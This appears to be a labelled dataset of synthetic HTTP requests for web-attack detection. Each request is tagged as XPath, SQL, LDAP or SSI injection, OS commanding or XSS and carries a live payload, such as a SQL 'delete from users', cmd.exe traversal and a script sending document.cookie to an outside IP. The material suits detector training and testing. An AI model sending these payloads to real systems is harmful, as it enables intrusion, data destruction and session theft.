ETag: "oKvFvmndVfB@fQhk6Q1"
Expect: 100-continue
From: 5a6ct@oese.gov
If-Modified-Since: Mon, 24 Mar 08 15:47:04 CET
If-Unmodified-Since: Fri, 17 Nov 06 24:21:57 GMT
If-Match: *
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Tue, 27 Feb 07 16:45:19 GMT
Max-Forwards: 436
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest nonce
Range: 724-
Referer: http://www.cqIuabr.it/lpseAKi/ha8k0/ont1.mpg
TE: gzip,trailers,deflate;q=0.0
Trailer: If-Match
User-Agent: Mozilla/5.5 (X11; U; Open BSD i586 9.6; to-in; rv:9.2.5) Gecko/69427560
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 3216x516
Via: 5.8 www.Naoc.tiff
Transfer-Encoding: compress
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 188.93.207.249
X-Serial-Number: 75398657
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46393
Start - Id: 49423
class: XPathInjection
GET /t2TciZ3y@p/tahas61/es1fnrNten5wdao0/mtyrcepttl04raihu/rsu@0YL6./bV/5te1eoee/cpiuL/0lsexeco.gnOtmpCoboot.ini/aaeH/f_SbnEaa5X/7egeodloe7uoaiUdE.exe?24bk=1350343&aeafte=64040036&uethneEaLstoiS=%29boE&eY6e=28473&ditltyn7Ear=lrlsetf9acobA9ttx&DakvoZGftpPg=nenan%27+++++or++++6+++%3C++++count%28path%2Fchild%3A%3A*%29++++or++++%27rcD%27++%3D++++%27&aiwmm5sc=din3o&lber5=5&Ller2t8ei=erehitAlogCmt+n HTTP/1.0
Host: www.fRrx8oceoe.com
Connection: w6elsta4
Accept: */*
Accept-Charset: iso-8859-8;q=0.2, x-mac-chinesetrad
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: d='iq'
Client-ip: 93.18.190.156
Cookie: tce=ivae;rn=zCax;fftex9loney=44;Use0sbWHrts=052
Cookie2: $Version="37"
Date: Fri, 24 Jul 09 04:41:00 GMT
ETag: "9EJy05E0HvEXhGvYe"
Expect: 8Usetdir
From: lyE3Znu@romta.biz
If-Modified-Since: Sat, 25 Jul 09 09:05:12 UTC
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: *
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: Sat, 13 Feb 10 22:24:05 UTC
Max-Forwards: 2838
MIME-Version: 0.6
Pragma: 8OcST='hE'
Proxy-Authorization: Digest nonce
Authorization: Basic dGV0aTpzVHJj
Range: -32,-92418
Referer: /InpEmsl/eNiaseLn/eay3/piwtep9m/ene4.css
TE: chunked;q=0.9,deflate;q=0.6,trailers
Trailer: Warning
User-Agent: Mozilla/3.1 (compatible; Konqueror/0.1; Linux i386; rE3n)
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 510x653
Via: FTP/9.9 109.241.36.3, 5.2 207.178.238.174, FTP/1.6 235.182.96.233
Transfer-Encoding: identity
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49423
Start - Id: 48886
class: XPathInjection
GET /e1e3snwaoablKsl9em/oznaqenxeUoddlAxmDmK/maeahe/tVtqEV-a5xuyx_AFft/eDJA7fG..i_f/IdfheufSiifcrfel/syNrthibi0ereog2ki.php4?fawyerAePent=orbtim&Co=inesntrRhhl&sruxkhsRzr=recqtwsdrcfdewydwt&Pdr_fZccJI=npisne%27++++or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28+i%2Bj%2B+++k+%2B+l+%2B++1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or++++%27eaNImiew%27+%3D+%27+rpr%27+or&aitcea0lIlan4ha=7&ityonit=Tetrans9 HTTP/1.0
Host: 174.160.106.240
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: mTeee-d3io, ayosfed-aehlm, tdade-xmnyn2, gh4ktnn-t0i, iroce-2o8m
Cache-Control: nIty='9'
Client-ip: 154.110.51.106
Cookie: bit8zpiedc=98959;ecGg2tycrE=434460318
Cookie2: $Version="74"
Date: Fri, 15 Apr 05 06:07:41 UTC
ETag: "yoHUBRdDJNDe7kMqNoJu"
Expect: 100-continue
From: nhrer@c9ndnn.gov
If-Modified-Since: Sat, 05 Apr 08 19:54:32 CET
If-Unmodified-Since: Thu, 12 Jun 08 13:29:51 CET
If-Match: *
If-None-Match: "b5U_PH56mbZCgza1K3bn"
If-Range: Sun, 27 Sep 09 23:27:54 CET
Max-Forwards: 896
MIME-Version: 4.6
Pragma: 3istR=ee8
Proxy-Authorization: dyscrl o8iQnhe=rsca
Authorization: Digest nonce
Range: 41-,-69
Referer: /teinse/foth/md0bi.rar
TE: trailers
Trailer: User-Agent
User-Agent: etjeni/7.3.8.0.3
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1420x8323
Via: HTTP/0.8 208.148.238.138:05, FTP/3.9 www.sifze.css
Transfer-Encoding: gzip
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 766 www.wbdsi.gif "iiitgc4re" "Thu, 08 May 08 03:06:26 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 3294435
----: ------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48886
Start - Id: 36532
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.ayettdto.st
Connection: keep-alive
Accept: text/*;q=0.7
Accept-Charset: hz-gb-2312, cp-932, cp-936
Accept-Encoding: 
Accept-Language: c-pne, 5e-ntehC
Cache-Control: nenoge=x
Client-ip: 213.233.54.110
Cookie: pFiVnlsalOh=396835;dttlscs61pN=lh rytlibS(dB4mensE;dakgeaeslst=89
Cookie2: $Version="647"
Date: Sun, 13 Jan 08 17:07:47 GMT
ETag: W/"NVc7rgRLv9r5cKh@1zV"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sun, 09 Sep 07 21:21:01 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "V_mO-w7S.u21jSYpSY"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 9
MIME-Version: 0.6
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 01232-,419-,638-
Referer: /mold/cGi7ri/iohtEi/enoha9ss/mdpe.avi
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: r9t5atisrhte7x
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: gzip
Upgrade: ernz/8.4, hotewo/3.0, etdeas/6.6, nbu/1.6, owgLo/3.9
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 55534835625911216707
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36532
Start - Id: 48079
class: XSS
GET /oJ8wN_4fwIAju5ps7.mdb?m8eRaaTe=466451&zebn0=erauoltaoo&qtmeibGuni6=%3Ciframe+++++src++%3D%22+++vbscript%3A%5Balert%28%27ts%27%29%3B%5D++%22++++%3E&5QwtDDP=7187935&GnodeVO=cluI0mX HTTP/1.0
Host: www.tisltlic.org:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: w-aioeplch;q=0.7, ntd-1a2test
Cache-Control: max-stale
Client-ip: 151.8.225.81
Cookie: oeaeeqomtnShEdt=ek3;yfehatitadK=hdn8ecrp;pvslu2Eatt1Dt=8738;asoMl=3;8s=cua:
Cookie2: $Version="5"
Date: Wed, 11 Jun 08 23:02:46 GMT
ETag: "U9-YQ6G4Lm_.cAH"
Expect: 6b3s=wacwl;nniqh=tatr
From: pr43lq@7remye.cz
If-Modified-Since: Sat, 12 Jul 08 18:49:49 CET
If-Unmodified-Since: Thu, 16 Nov 06 10:01:57 CET
If-Match: *
If-None-Match: "fuoh7eEbTW7LhPidu"
If-Range: *
Max-Forwards: 25
MIME-Version: 2.5
Pragma: hroea5r=rbt6
Proxy-Authorization: Digest nonce
Authorization: Rucfn yksNds=e8tWg
Range: 5052-
Referer: /n5yh/nrsr/Vpomro/lcSaatn.tiff
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/2.0 (Windows; U; Win98 7.0; jd-re; rv:2.0.9) Gecko/33996286
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: 7.0 www.tsat.htm, 4.6 www.lh03.css
Transfer-Encoding: compress
Upgrade: urlbSi/7.2, soAe/2.2, syle/8.0
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 48079
Start - Id: 41441
class: SqlInjection
PUT /Qwindow.open6gVA2w-/Mj2NX0autoexecTEHGQt./osoRoa/stgmiar9en/iwewa4oae/p4VOncTQ9bv423cZl/4B.86a2va.Np-kNN/eelt/1GbC6@DNFxt0aGGU7/laEe7uos8mtai2y.nsf? HTTP/1.1
Content-Length: 156
Content-Language: x,nr
Content-Encoding: deflate
Content-Location: /1drw/vrsch/nauO8d.mspx
Content-MD5: UGxzQmRlcmRyNHNxVHcxbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Aug 06 08:38:16 GMT
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: www.ftrt.de
Connection: close
Accept: text/html;q=0.1, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: CRhpSe-sbeaeTol;q=0.5
Cache-Control: no-store
Client-ip: 170.255.57.155
Cookie: ib7==eH2noshH;htsTeouyE=it5;irOpaTgiy6fdso9=boot.inirsOrne3;wetceiaiebos=9521
Cookie2: $Version="41"
Date: Fri, 12 May 06 02:35:14 GMT
ETag: "leLIR_bfgo22sOQ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: "LksjpT9Vqso3VodlRT"
If-None-Match: *
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: pqonb enmhpnom=fenruoo7
Range: 78106-77620,1196-
Referer: http://0rEi.ch/pvoma/rmss/rkdae/noloa.txt
TE: deflate;q=0.2
Trailer: Date
User-Agent: 2vQ2k_kK http://www.stDb.be
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: HTTP/4.8 14.7.10.11, 5.6 76.230.3.218, lka/0.4 www.ye7aetr.gif
Transfer-Encoding: deflate
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 671 145.233.120.251 "tiua3dtweorond5gt" 
X-Forwarded-For: 243.251.179.229
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cEEsftHednn=71786142&connectvY0M='   );     delete     from  users; commit;     dummy(    '&tUsnoresuos=1437&yoZet=e6tsEcteoe&ghisyssou=aLnokq

End - Id: 41441
Start - Id: 37715
class: LdapInjection
PUT /Rasxeywasy5nt7ae/snIU1b/.Hadminb/9sI0s9ofgsrhaceOFwtb/l8fwxaltln/asfizoNm/8g8sock_streama2HoXssamZhtpassdq.gif? HTTP/1.1
Content-Length: 359
Content-Language: 7efi,mowhr
Content-Encoding: identity
Content-Location: http://www.eHwo0pIe.cz/cefu/iPamhzy/jeortee.txt
Content-MD5: dWVhYVdpd3Nyb01sbmRycg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Jan 05 06:43:18 UTC
Last-Modified: Sat, 19 Aug 06 05:39:10 CET
Host: 102.78.104.185
Connection: keep-alive
Accept: video/*;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: Y-gfrrhlne, cbo-wclcsi;q=0.4, dsi-satctueu, mmistmxt-smpntte;q=0.8, Ggoi-etnOts;q=0.3
Cache-Control: no-transform
Client-ip: 221.29.121.34
Cookie: eadthfm=525;woNfOilt=5177;oaufsrqawecO=6Fmdh@;haloy4onerlnt=elles7uta e;etnejek=oevrvnsreuh;iumSso6uEn=m
Cookie2: $Version="321"
Date: Sat, 22 Dec 07 09:23:38 CET
ETag: W/"Cs9xygawlnPcuJ3Z1I"
Expect: 100-continue
From: akitst@eby6l.net
If-Modified-Since: Wed, 25 Oct 06 05:51:16 UTC
If-Unmodified-Since: Mon, 04 Oct 04 15:56:13 UTC
If-Match: "gYAAsNsvRjUtupT"
If-None-Match: *
If-Range: Sat, 20 Mar 10 13:55:19 CET
Max-Forwards: 660
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM U2VhdWVyZUFuc21laG5pZWFwMXd5aGVleWNvY3JhQWVlbWxTdA==
Referer: /xTfr.swf
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/5.4 (Machintosh; U; PPC 5.6; pA-ln; rv:7.6.0) Gecko/09362223
UA-CPU: MIPS
UA-Disp: 999,847,16
UA-Color: color16
UA-Pixels: 8766x859
Via: 4.1 0.232.200.177:4, 7.3 127.159.87.14, 6.1 www.eetnf.tiff
Transfer-Encoding: gde8
Upgrade: beagd/0.0, 8at/9.9, elr/1.5, luY/7.5
X-Forwarded-For: 34.122.30.225
X-Serial-Number: 053115321
~~~~~: ~~~~~~~~~~~

eSPtt1=rcNmiiS&f4inosmtLh8=kprocessing-instructionnow tuwo&XIevalzW4i=7yo&nma=lsE&7oeiipYlmvye8=a4PxF&issabladed=et&wX.1lsscript1A=aTbaa&yhne6mSe8sfl=0&ue3mEnmeatEema=7380589387&MsIjaMerh=azxeeIlaLOa&a0idert1oNH20as=727)(&(objectClass=xqn)(|(sn=  tstr)(cn=i  J*))&hhse=rdsax5CADOf&ighxr0ubetsem=88&Enn=igu &caeus0pb0teeieN=itny r

End - Id: 37715
Start - Id: 47959
class: XSS
GET /aV1F@HzJVgOtAPx/vBmrE87I/raFv0nROju6p_VzC5zhJ/e6cc1H/v._mUOsBc/2escriptj.qObS1qtC/mq7/tam/mt/amotIUs/iqgsirtwlt9/m67R.gif?os6xtTNcrt=ni&ieeilosrhqzrrAW=al&nwvooettdtnehr=%5B%5CxC0%5D%5B%5CxBC%5Dscript%3E%5Bwindow.open%28%27http%3A%2F%2F133.102.140.53%2Fsi.cfm%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript++%3E&xa=tprocessing-instruction HTTP/1.1
Host: www.thOpiw.biz
Connection: keep-alive
Accept: video/mpeg, audio/basic;q=0.7, text/xml
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: tOm2I-lpoogeu;q=0.6, 6wibNndn-xrst, s-encDl
Cache-Control: no-cache
Client-ip: 234.54.187.109
Cookie: WGO-UokpkdC=8677479;1eaiexmozpb=;e;oedntylmrse=httpaesatsrci
Cookie2: $Version="803"
Date: Sun, 10 Jun 07 08:59:55 GMT
ETag: "WEVlnkxAx84k3BG8N5"
Expect: 100-continue
From: e4le@beZlsQbrdn.de
If-Modified-Since: Sun, 16 May 04 17:40:16 UTC
If-Unmodified-Since: Wed, 16 Dec 09 03:48:19 CET
If-Match: *
If-None-Match: "AVCYDAvM3t6Anhha8t4"
If-Range: *
Max-Forwards: 4
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: noVEdn roedY=desdiE
Authorization: Basic YWhpbkU6dWxhZW9s
Range: -162,92-
Referer: http://orn5t.de/hbhaetdj/eYorrer.exe
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/4.4 (compatible; hhae; SunOS sun4u; ijljlC; ett7)
UA-CPU: 68000
UA-Disp: 524,0279,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3364x532
Via: 2.7 108.124.36.83, 1.8 www.obreie.jpg:938, HTTP/1.8 www.xIote.tiff
Transfer-Encoding: gzip
Upgrade: tco/6.7, yt2ien/0.1, jit/2.8, ect/0.5, ket1t/7.7
Warning: 258 www.enaLrqsn.shtml "owbjsDoG4e" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 295187512067430923
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47959
Start - Id: 41006
class: SqlInjection
PUT /L3A@connectHYDNefWaGW/vfdjud@likeyDlsDX/TtawCerjvIllne/eNNnvGoOPJj-XRjh/xt9i/mg0mOkjCv_xFD0/vKb0zPj644T@uu/Vj.iframebodyphpQHKZ/Oz8bsenmaribboHNeXae/Sayh5aoahtsIhlnttas/J0Doutexoyqtnp2Chn.html? HTTP/1.1
Content-Length: 214
Content-Language: frtag
Content-Encoding: compress
Content-Location: http://ciehAte.st/wsowa/cilm/nhgruun/qt0EE/rehI.cgi
Content-MD5: MmVpbGFldTlvb3JsZW50RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Nov 06 22:16:09 UTC
Last-Modified: Thu, 07 May 09 11:08:51 CET
Host: www.kiua.st:2801
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=2172
Client-ip: 40.88.12.243
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="889"
Date: Mon, 29 Mar 10 20:59:40 UTC
ETag: W/"yB2VYqpUnbgTE.vlG9"
Expect: v0sro3=eghTm;eprtAa2
From: 7nl6mn3@atvy.de
If-Modified-Since: Wed, 27 Dec 06 09:20:42 CET
If-Unmodified-Since: Wed, 06 Aug 08 14:32:16 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 11 Nov 06 03:09:49 CET
Max-Forwards: 9970
MIME-Version: 8.3
Pragma: no-cache
Authorization: 9etso itrab=ohxvo2N
Referer: /oaore/9i6uiNo.msf
TE: trailers,gzip
Trailer: Expect
User-Agent: Mozilla/4.9 (Windows; U; Win98 7.1; cf-7e; rv:9.2.5) Gecko/11096216
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: gzip
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 481 www.urpe.html "staaipsty" "Sat, 08 Jan 05 13:43:34 GMT"
X-Forwarded-For: 66.233.204.94
X-Serial-Number: 0694203566390094
----: ------------

rhe53Y=';     EXEC  master.dbo.sp_makewebtask     'c:\inetpub\wwwroot\hagy.html',     'SELECT snr9wav   FROM     ecIaobi     WHERE  xtype=''U'''&cejiEieltiery=do&wraiesiert=tscripthp

End - Id: 41006
Start - Id: 37502
class: LdapInjection
GET /l0PKv2Vw7n/2E7hq8yd5wke7/7formkunion-/tssRmV62RzPEAG/autoexecFHM/dafkhnRin/jsmeioCeDjeoqrtrettt/qFJOQY-7uJuMLJCG6/244osgi5rteIlahbs.html?86oDDiX9ve0e09=e9hniauamna&7nwaSatt=744&jedfmeto=gefb%40exec+oltstI&derqyset4lBiger=2198850338&Dhiframexp_SX=wp-%5D%5BS3&artrdksmdetl=88&IenaaNnch=ss%3Bhnbvnh%27co&owrell=swb%40aw%7ElNDvnetcatee HTTP/1.0
Host: 200.33.36.16
Connection: keep-alive
Accept: image/*;q=0.4, application/*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: s-t6naun, Alium-wllp;q=0.5, zxlt4et-D, jgbfaneh-cdUow;q=0.9
Cache-Control: ml0ee=2
Client-ip: 152.26.54.90
Cookie: 3VformpositionCR=malocation;eN7una1d9e87fE=030)(&(objectClass=os2h)(|(sn    =  W6i)(cn=iXro J*));gestmxN1agt3e=37078246;4PBwQhO=l4sTtbeittt;kdZFxsDb=5423;nona9odSRmtet=tohza7a9aNknYwq
Date: Thu, 12 Jun 08 08:59:45 UTC
ETag: W/"HQGIHOAUHM0S0o1Ipl"
Expect: 100-continue
From: G0Tehr7@TrsnATrdr.st
If-Modified-Since: Thu, 11 Aug 05 05:41:44 CET
If-Unmodified-Since: Sat, 16 Oct 04 12:06:38 GMT
If-Match: "QkID@c-Hmmp4FbIlA3"
If-None-Match: *
If-Range: *
Max-Forwards: 9
Range: -02377,787126-
Referer: /sjienr.txt
TE: deflate
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 6.4; ez-ai; rv:8.1.6) Gecko/68134639
Via: 7.7 www.wizn.gif, 7.8 www.eaWj.html
Warning: 327 231.32.119.121:2369 "lisaanriatalii" "Wed, 05 Jul 06 22:05:13 CET"
X-Serial-Number: 222207

null

End - Id: 37502
Start - Id: 41480
class: SqlInjection
PUT /auCF/s3Jv@6Z0g/nIDDP/Macseosoaatoc/hk_KOXGbMDQhZZU/ebzseiotrno9yuomh/hteou7aAsril.html? HTTP/1.0
Content-Length: 191
Content-Language: rpdlorr,fe
Content-Encoding: identity
Content-Location: http://www.nlih.st/eoeuce/osgts/ttnzm.ace
Content-MD5: eXRsYWVjbmFvZWVhVG9hYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Aug 07 24:06:58 GMT
Last-Modified: Wed, 21 Dec 05 14:23:57 GMT
Host: www.noey.de
Connection: keep-alive
Accept: application/zip;q=0.7, video/mpeg;q=0.7
Accept-Charset: windows-1253, windows-1250;q=0.9, windows-1251;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 141.248.241.47
Cookie: ittttnieiej=9247712;rthas=6517;fhoacHet=0Cm;etjbapt6dri9ee=icn;ixiOt=ei
Cookie2: $Version="4"
Date: Mon, 19 Apr 04 08:41:47 GMT
ETag: "VnPwVfdJ4vTCf5WSay"
Expect: 100-continue
From: aase0a2W@eEfhtw.gov
If-Modified-Since: Wed, 30 Jun 04 06:07:35 UTC
If-Unmodified-Since: Sat, 17 Jan 09 10:45:15 UTC
If-Match: "iGC_BYX0E1ngwljI"
If-None-Match: *
If-Range: Sat, 01 Jan 05 15:56:28 CET
Max-Forwards: 82
MIME-Version: 4.3
Pragma: ne=taavEa
Proxy-Authorization: Basic NkJjbTphZ3JsMmp3ZQ==
Authorization: Basic dG5pNWJlaDpybGVuc3R4
Range: 78-403185
Referer: http://gasvoh.cz/ohcsi4.cfm
TE: gzip;q=0.0
Trailer: Accept-Encoding
User-Agent: Mozilla/5.1 (X11; U; Unix 9.3; mu-sh; rv:8.3.1) Gecko/77413300
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 853x9987
Via: 8.6 www.ln6oeh.css, FTP/2.5 161.76.234.172:0, FTP/1.8 www.ctaT.html
Transfer-Encoding: compress
Upgrade: duea/0.0
Warning: 644 www.or4te.js "ecd9adohmafA" "Sun, 18 Jan 09 08:09:07 UTC"
X-Forwarded-For: 37.28.59.187
X-Serial-Number: 6237226305508453843
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lgoaInnhctn=hldT&bn=;   exec  get_cust( 'x''     union    select  object_name,object_type,''x''  from   user_objects where     ''srxig'' = '' '    );

End - Id: 41480
Start - Id: 44032
class: OsCommanding
GET /bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\,? HTTP/1.1
Host: www.wu4br.ch
Connection: d9eh
Accept: application/*, image/*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="0"
Date: Wed, 14 Jan 04 11:59:45 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: opalhdh
From: t8ara@rpmnyne.de
If-Modified-Since: Tue, 12 Feb 08 10:52:51 UTC
If-Unmodified-Since: Wed, 16 Jan 08 15:07:16 GMT
If-Match: *
If-None-Match: "hcu2HQJwzIw8snN"
If-Range: "Ttz8MTOQXZg6S1G"
Max-Forwards: 6
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: /biNrsmaM/prgse.sh
TE: trailers,trailers
Trailer: Accept
User-Agent: adydyteS (pDZOnS5l; nvvZXL.Jty; c7pv1110M; 4TJZqnKPYu)
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: isntf/0.3 89.68.238.16, 8.7 www.oiwrxba.gif
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44032
Start - Id: 37802
class: LdapInjection
GET /oDgTsMR89wAID/bEVedU2Nts9pLG8VP/edtfmGh0ioehtoe7an/Qj/tael9lgdntay/pu-Qab/z9/uomdiNTnwtegsad/necrev2lnfrercbav.pl?aFinn3aS=%29++++%28+++%7C+%28eoe%3DtRzat*%29 HTTP/1.0
Host: www.7eeir4.gov
Connection: nimiT
Accept: */*;q=0.4
Accept-Charset: iso-8859-15, iso-2022-jp;q=0.6, windows-874
Accept-Encoding: *;q=0.1
Accept-Language: atmaea-dc;q=0.0, rsterqtr-radsel, 7-cne10re;q=0.3, hSOiON0-uN
Cache-Control: max-stale=5454
Client-ip: 148.220.0.143
Cookie: joedhhd=tM2df7pPx;sctsaan=ke;8Nsx3shee8cbN=soaieo;s5s=rnioar le
Cookie2: $Version="22"
Date: Tue, 05 Feb 08 13:50:31 CET
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: 100-continue
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Wed, 24 Feb 10 10:15:45 CET
If-Match: *
If-None-Match: "hW.fIAZfKoFn4SpC6LX"
If-Range: *
Max-Forwards: 951
MIME-Version: 1.7
Pragma: ei=DiNn
Proxy-Authorization: Digest realm
Authorization: Digest nc=bC8DDEDe
Range: -1,56487-
Referer: /1eci/lwr6iogm/mevu.js
TE: gzip,gzip;q=0.6,gzip
Trailer: Expect
User-Agent: yLr8XJik http://www.tnto2r.it
UA-CPU: x86
UA-Disp: 654,6999,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/3.5 www.ioonetA.gif:97447
Transfer-Encoding: identity
Upgrade: rasu/0.8, teies/0.4, nSn4/5.5, rceyaa/2.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37802
Start - Id: 39402
class: SSI
GET /4hnihi.js?IBakhgd8rFG=a&KDkBXformN=458524689&1n7eioytomi=68&tes=s2R33DnK_0c&NdD4t=teedsi5bt&7v1VyVt8=unekhatjaa&DcopyRT@xe_p=%24%3F0%3Bexec&.k_p4N6vbscript=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&aneoateA6ruow=p0 HTTP/1.0
Host: www.v7i2.st:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Language: rnG9gehh-0taeosm;q=0.7, 0ecAco6y-oa6Dr
Cookie2: $Version="6"
Date: Tue, 30 Jan 07 16:51:20 CET
ETag: W/"25Kpjj4nIKKJBndjeb"
If-Unmodified-Since: Fri, 14 Dec 07 15:08:56 CET
If-Match: "QQFX-43LN2Lf5RAX2ndp"
Max-Forwards: 8
Pragma: ssfenNl='ad1ueov'
Authorization: Digest nc=40E96d4c
Referer: /rDhaprL/bwuiNsx/ue3is/2rue.tar
Trailer: If-Match
User-Agent: Mozilla/6.7 (compatible; sl7sui9uAr; Mac OS X; Etonuao; sb9rh7e; iltriym)
UA-CPU: x86
Transfer-Encoding: reifei; yw8mac=waeyrvlo

null

End - Id: 39402
Start - Id: 46667
class: XSS
